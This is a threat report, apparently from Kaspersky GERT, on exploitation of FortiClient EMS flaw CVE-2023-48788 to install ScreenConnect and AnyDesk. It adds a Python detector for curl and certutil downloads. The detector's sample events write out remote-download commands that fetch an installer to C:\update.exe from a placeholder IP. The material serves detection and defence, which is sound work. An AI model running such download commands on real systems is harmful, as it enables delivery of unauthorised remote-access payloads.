Attackers are exploiting a FortiClient EMS vulnerability for which Fortinet had already published a patch in March 2024.
The vulnerability, CVE-2023-48788, is an improper neutralization of special elements in an SQL command (CWE-89), i.e. an SQL injection, and affects Fortinet FortiClient EMS versions 7.0.1 through 7.0.10 and 7.2.0 through 7.2.2.
If successfully exploited, it lets an unauthenticated remote attacker execute unauthorized code or commands on the EMS server by sending specially crafted requests, endangering users across various regions.
The attackers' initial point of entry was our client's Windows server running FortiClient EMS, which was exposed to the internet.
They used a curl command to download an installer for the ScreenConnect remote access application.
They also used the native Windows binary certutil to fetch the same file; in both cases the downloaded installer was stored as 'update.exe' in the root of the C: drive.
Once ScreenConnect was installed, the attackers uploaded further payloads to the compromised system to begin discovery and lateral movement, and established additional persistence through other remote control tools such as AnyDesk.
While tracking this threat further, on October 23, 2024 GERT analysts detected active in-the-wild exploitation attempts of CVE-2023-48788 that executed a similar command.
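The download step described above (curl and certutil fetching a remote installer and writing it to the root of C:) is the part of this chain that is easiest to catch in process-creation telemetry, and it is the same pattern GERT saw again in the October attempts. The following is an added example, not Kaspersky/GERT code and not telemetry from the incident: it runs a small classifier over constructed Sysmon-style process-creation records (image and command line only) and flags certutil -urlcache and curl downloads, raising severity when the output file lands directly under a drive root or is an executable. The IP address and file names in the sample events are made up.

```python
"""Flag LOLBin-style remote downloads (certutil -urlcache, curl) in
process-creation events. Added example; the sample events below are
constructed, not real telemetry."""
import os
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

TOKEN_RE = re.compile(r'"[^"]*"|\S+')               # whitespace split, honouring quotes
URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
DRIVE_ROOT_RE = re.compile(r'^[A-Za-z]:\\[^\\/]+$')  # a file directly under C:\ (or any drive)


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon Event ID 1 / Security 4688)."""
    image: str
    command_line: str


@dataclass
class Finding:
    tool: str
    url: str
    dest: Optional[str]
    severity: str
    reason: str


def tokenize(command_line: str) -> List[str]:
    return [t.strip('"') for t in TOKEN_RE.findall(command_line)]


def _severity(dest: Optional[str]) -> Tuple[str, str]:
    if dest is None:
        return "medium", "remote fetch with no explicit output file"
    if DRIVE_ROOT_RE.match(dest):
        return "high", "payload written to the root of a drive"
    if dest.lower().endswith(".exe"):
        return "high", "executable written to disk"
    return "medium", "file downloaded to disk"


def classify(event: ProcessEvent) -> Optional[Finding]:
    toks = tokenize(event.command_line)
    if not toks:
        return None
    exe = os.path.basename(toks[0].replace("\\", "/")).lower()
    urls = [t for t in toks if URL_RE.match(t)]
    if not urls:
        return None                     # no remote source on the command line
    url = urls[0]
    dest = None
    if exe in ("certutil", "certutil.exe"):
        # certutil [-urlcache] [-split] -f <url> <outfile>; -f, -split and -urlcache
        # may also be written with a leading slash
        flags = {t.lstrip("-/").lower() for t in toks[1:] if t and t[0] in "-/"}
        if "urlcache" not in flags:
            return None
        i = toks.index(url)
        if i + 1 < len(toks):
            nxt = toks[i + 1]
            if nxt and nxt[0] not in "-/":
                dest = nxt
        tool = "certutil"
    elif exe in ("curl", "curl.exe"):
        for i, t in enumerate(toks[1:], start=1):
            if t in ("-o", "--output") and i + 1 < len(toks):
                dest = toks[i + 1]
            elif t.startswith("-o") and len(t) > 2 and not t.startswith("--"):
                dest = t[2:]            # -oC:\update.exe form
            elif t == "-O":
                dest = url.rsplit("/", 1)[-1] or None
        tool = "curl"
    else:
        return None
    severity, reason = _severity(dest)
    return Finding(tool, url, dest, severity, reason)


def scan(events: List[ProcessEvent]) -> List[Finding]:
    return [f for f in (classify(e) for e in events) if f is not None]


# Constructed sample events (203.0.113.0/24 is a documentation range).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://203.0.113.10/installer.exe C:\update.exe"),
    ProcessEvent(r"C:\Windows\System32\curl.exe",
                 r"curl -o C:\update.exe http://203.0.113.10/installer.exe"),
    ProcessEvent(r"C:\Windows\System32\curl.exe",
                 r'"C:\Windows\System32\curl.exe" -s https://203.0.113.10/health'),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil -hashfile C:\Windows\System32\kernel32.dll SHA256"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile -Command Get-Process"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.tool}: {f.url} -> {f.dest} ({f.reason})")
```

The third sample (curl with no output file) is kept at medium on purpose: curl ships with Windows 10 and later and shows up in legitimate health-check scripts, so the useful signal here is the combination of a remote URL with a file written to a drive root or an .exe destination, and in a real deployment the rule should also carry the parent process so that a download spawned from a server-side daemon or database engine can be prioritised.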
Analysis of this incident shows that the techniques attackers use to deploy remote access tools are being updated constantly and are growing in complexity.
We strongly recommend applying the vendor patch for CVE-2023-48788, not exposing the EMS server to the internet, installing an EPP agent on every host running an OS, and configuring additional controls such as Application Control so that unapproved binaries, remote access tools among them, cannot be launched.